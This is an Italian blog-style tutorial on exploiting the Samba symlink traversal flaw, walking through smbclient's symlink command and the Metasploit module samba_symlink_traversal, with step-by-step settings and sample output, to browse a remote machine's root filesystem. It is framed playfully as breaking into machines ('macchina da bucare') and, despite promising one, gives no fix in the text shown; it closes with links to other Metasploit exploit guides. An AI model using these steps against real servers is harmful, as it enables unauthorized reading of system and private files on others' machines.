Ehehe anche i programmi per linux, a volte soffrono di gravi bug, dovuti a qualche incertezza durante la programmazione.
Ad esempio, il famoso client share di ubuntu SAMBA è vulnerabile da un attacco Symlink Traversal.
Questo fattore, permette a chi vuole attaccare una condivisione remoto di leggere non solo la condivisione, ma anche i file nelle altre cartelle.
Vediamo ora come sfruttare questo semplice exploit con metasploit (e non) e come fixare questa vulnerabilità.
Facciamo un esempio, facciamo finta che dal mio ubuntu CLSHACK-PC abbia condiviso la cartella MUSICA.
Ora, da un altro mio pc ubuntu ci accederò cosi:
smbclient -Usmb //CLSHACK-PC/MUSICA/
e Avrò questo output:
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \>
Ora ad esempio, utilizzando il comando ls, posso listare i file che risiedono dentro la condivisione.
Ma se volessi li stare i file in etc?
nessun problema, samba me lo permette :D
Quindi digito:
smb: \>
symlink DESTINAZIONE file
Ora spostiamoci nella cartella file e buon divertimento :)
Usare questo exploit con metasploit ?
Semplice, aggiorniamolo digitando:
svn update
Ora, apriamolo e digitiamo:
use auxiliary/admin/smb/samba_symlink_traversal
Macchina da bucare :)
set RHOST IP_REMOTO
set SMBSHARE NOME_CONDIVISIONE
set SMBTARGET root
run
Avremo questo output(simile):
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share jar...
[*] Trying to link 'root' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.152\jar\root\
Perfetto ora spostiamoci nella condivisione:
IP_REMOTO/CONDIVISIONE/root
E buon divertimento :)
Altri:
- [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- Guida all'uso di Metasploit
- Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
- GUIDA a METASPLOIT IN PDF [65 pagine :) ]
